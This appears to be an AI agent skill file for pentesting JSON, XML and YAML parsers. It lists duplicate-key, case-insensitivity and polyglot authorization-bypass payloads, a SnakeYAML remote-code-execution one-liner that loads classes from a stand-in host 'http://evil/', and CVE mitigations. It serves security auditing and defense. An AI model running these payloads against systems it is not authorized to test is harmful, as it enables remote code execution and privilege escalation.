Hacktricks-skills json-xml-yaml-hacking

Security testing skill for auditing JSON, XML, and YAML parser vulnerabilities. Use this skill whenever you need to test for deserialization attacks, parser inconsistencies, duplicate field exploits, case-insensitivity bypasses, or data format confusion attacks. Trigger this skill for any security audit involving data parsing, API input validation, authentication bypass testing, or when reviewing code that handles JSON/XML/YAML deserialization. Don't skip this skill when testing web applications, microservices, or any system that parses structured data from untrusted sources.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/json-xml-yaml-hacking/SKILL.MD
source content

JSON, XML & YAML Parser Security Testing

This skill helps you identify and exploit parser vulnerabilities that can lead to authentication bypass, privilege escalation, and data exfiltration.

Quick Start

  1. Identify the target parser (Go, Java, Python, etc.)
  2. Select the attack vector based on the parser's known weaknesses
  3. Craft the payload using the patterns below
  4. Test and observe how the parser handles the input

Attack Vectors

1. (Un)Marshaling Unexpected Data

Exploit struct field handling to read/write sensitive fields.

Missing JSON tags:

type User struct {
    Username string  // No tag = still parsed
}

Payload:

{"Username": "admin"}

Incorrect

-
tag usage:

type User struct {
    IsAdmin bool `json:"-,omitempty"`  // Wrong! Should be `json:"-"`
}

Exploit payload:

{"-": true}

Test checklist:

  • Check for struct fields without JSON tags
  • Look for malformed
    json:"-"
    tags (e.g.,
    json:"-,omitempty"
    )
  • Attempt to set sensitive fields via JSON input
  • Verify
    omitempty
    doesn't prevent field injection

2. Parser Differentials

Exploit how different parsers interpret the same payload differently.

Duplicate fields (last-wins vs first-wins):

{"action":"UserAction", "action":"AdminAction"}
  • Go
    encoding/json
    : takes last value (
    AdminAction
    )
  • Java Jackson: takes first value (
    UserAction
    )

Case insensitivity (Go-specific):

{"AcTiOn":"AdminAction"}
  • Go: matches
    Action
    field (case-insensitive)
  • Python/Java: may not match (case-sensitive)

Unicode tricks:

{"aKtionſ": "bypass"}
  • Go's case-insensitive matching can be fooled with Unicode

Cross-service mismatch attack:

{
  "action": "UserAction",
  "AcTiOn": "AdminAction"
}
  • Python service sees
    UserAction
    (allows)
  • Go service sees
    AdminAction
    (executes)

Test checklist:

  • Send duplicate keys and observe which value is used
  • Try case variations of field names
  • Test Unicode character substitutions
  • Map all services in the request path and their parser languages
  • Look for authorization decisions made by different services

3. Data Format Confusion (Polyglots)

Exploit systems that mix parsers or fail open on errors.

CVE-2020-16250 pattern (Vault XML/JSON confusion):

{
  "action": "Action_1",
  "AcTiOn": "Action_2",
  "ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>"
}

Expected behavior:

  • Go JSON parser:
    Action_2
    (case-insensitive + last wins)
  • YAML parser:
    Action_1
    (case-sensitive)
  • XML parser: parses
    Action_3
    from the string

Test checklist:

  • Check if
    Accept
    header can be controlled
  • Look for fallback parsers (JSON → XML, etc.)
  • Embed XML/HTML in JSON string fields
  • Test parser error handling (does it fail open?)
  • Verify content-type validation is strict

Known Vulnerabilities (2023-2025)

SnakeYAML Deserialization RCE (CVE-2022-1471)

Affects:

org.yaml:snakeyaml
< 2.0

One-liner PoC:

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]

Mitigation:

  • Upgrade to ≥2.0 (uses
    SafeLoader
    by default)
  • Use
    new Yaml(new SafeConstructor())
    on older versions

libyaml Double-Free (CVE-2024-35325)

Affects:

libyaml
≤0.2.5

Impact: DoS or heap exploitation via double-free

Mitigation: Upgrade to 0.2.6 or distro-patched release

RapidJSON Integer Overflow (CVE-2024-38517 / CVE-2024-39684)

Affects: RapidJSON before commit

8269bc2
(<1.1.0-patch-22)

Impact: Heap corruption via crafted numeric literals

Mitigation: Compile against latest RapidJSON (≥July 2024)

Mitigations Reference

RiskFix / Recommendation
Unknown fields (JSON)
decoder.DisallowUnknownFields()
Duplicate fields (JSON)Validate with external library (no stdlib fix)
Case-insensitive match (Go)Pre-canonicalize input + validate struct tags
XML garbage data / XXEUse hardened parser (
encoding/xml
+
DisallowDTD
)
YAML unknown keys
yaml.KnownFields(true)
Unsafe YAML deserializationUse SafeConstructor / upgrade SnakeYAML ≥2.0
libyaml ≤0.2.5Upgrade to 0.2.6
RapidJSON <patchedCompile against latest (≥July 2024)

Testing Workflow

Step 1: Reconnaissance

  • Identify all parsers in the request path
  • Map which service makes which authorization decision
  • Check parser versions and configurations

Step 2: Payload Crafting

  • Start with simple duplicate fields
  • Add case variations
  • Try Unicode substitutions
  • Embed alternative formats in string fields

Step 3: Execution

  • Send payloads to each service independently
  • Observe differences in behavior
  • Look for authorization bypasses

Step 4: Verification

  • Confirm the exploit works end-to-end
  • Document the exact parser differential
  • Provide remediation steps

Related CWEs

  • CWE-915: Mass Assignment (unmarshaling unexpected data)
  • CWE-502: Deserialization of Untrusted Data
  • CWE-170: Improper Null Termination (parser edge cases)

References

  • Trail of Bits: Unexpected Security Footguns in Go's Parsers
  • CVE-2017-12635: Apache CouchDB duplicate key bypass
  • CVE-2020-16250: HashiCorp Vault XML/JSON confusion
  • CVE-2022-1471: SnakeYAML deserialization RCE
  • CVE-2024-35325: libyaml double-free
  • CVE-2024-38517 / CVE-2024-39684: RapidJSON integer overflow